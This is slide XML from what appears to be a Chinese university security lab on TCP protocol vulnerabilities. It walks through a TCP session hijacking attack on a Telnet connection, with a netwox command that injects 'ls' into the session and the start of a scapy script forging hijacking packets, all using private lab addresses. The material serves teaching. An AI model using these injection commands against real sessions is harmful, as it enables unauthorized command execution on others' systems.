                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>mixed_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="等线" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>    mixed data</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18"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258536270"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实验目的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8194" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="469900" marR="0" indent="-469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Char char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>本实验的学习目标是让学生获得有关</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>协议</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>漏洞的第一手经验，以及针对这些漏洞的攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="0" indent="-469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Char char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TCP/IP协议中的漏洞代表了协议设计和实现中的一种特殊类型的漏洞，它们提供了宝贵的教训</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="469900" marR="0" indent="-469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Char char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>重点学习</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>协议的漏洞以及如何利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>漏洞进行攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">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zh-CN" altLang="en-US" sz="3000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t"/>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en-US" sz="1200" dirty="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>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wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>截包</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="图片 15"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360680" y="1196752"/>
            <a:ext cx="12390663" cy="4744943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4067944" y="81815"/>
            <a:ext cx="7899400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>要伪造发下一个包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>，需要根据从服务器返回的最后一个报文中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>nextseq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>来伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="1" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>最后一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="1" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>数据包内容如下</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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构造报文</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>将`ls`转换成16进制并加上`\r`的16进制数得到6c730d00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>netwox 40 --ip4-src </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.183.140</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> --ip4-dst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.183.155</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> --tcp-src </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>42905</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> --tcp-dst </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> --tcp-seqnum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3564374010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> --tcp-acknum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>23546013</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>35</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> --tcp-ack --tcp-window 114 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--tcp-data "6c730d00“</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 后面就是我们要注入的命令</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wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>截包看发送的报文</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 16"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="890905" y="1752600"/>
            <a:ext cx="7352030" cy="4267200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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服务器的响应</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>--ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的执行结果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 17"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1498600" y="1739265"/>
            <a:ext cx="5679440" cy="4509135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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0B2F7C-D04C-476D-BC25-9DD3D577DA43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>scapy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>手动）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="内容占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F44F2BF-E38A-4399-BB77-87CE8C2355DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566738" y="1752600"/>
            <a:ext cx="8001000" cy="3692624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>#!/usr/bin/python3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>scapy.all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" b="1" dirty="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>print("SENDING SESSION HIJACKING PACKET.........")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  = IP(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10.0.2.6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>dst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10.0.2.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> = TCP(sport=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>59896</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>dport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>23</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>, flags="A", seq=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1036464067</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" b="1" dirty="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>, ack=</a:t>
            </a:r>
            <a:r>
